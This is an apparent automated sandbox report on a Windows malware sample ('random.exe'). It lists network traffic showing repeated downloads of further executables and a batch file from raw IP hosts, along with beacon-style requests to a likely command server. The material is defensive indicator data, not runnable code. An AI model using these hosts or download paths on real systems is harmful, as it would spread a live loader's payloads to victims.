Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009C2710 recv,recv,recv,recv,

0_2_009C2710

Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/bonus_max/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /success?substr=mixfour&s=three&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success?substr=mixtwo&s=three&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
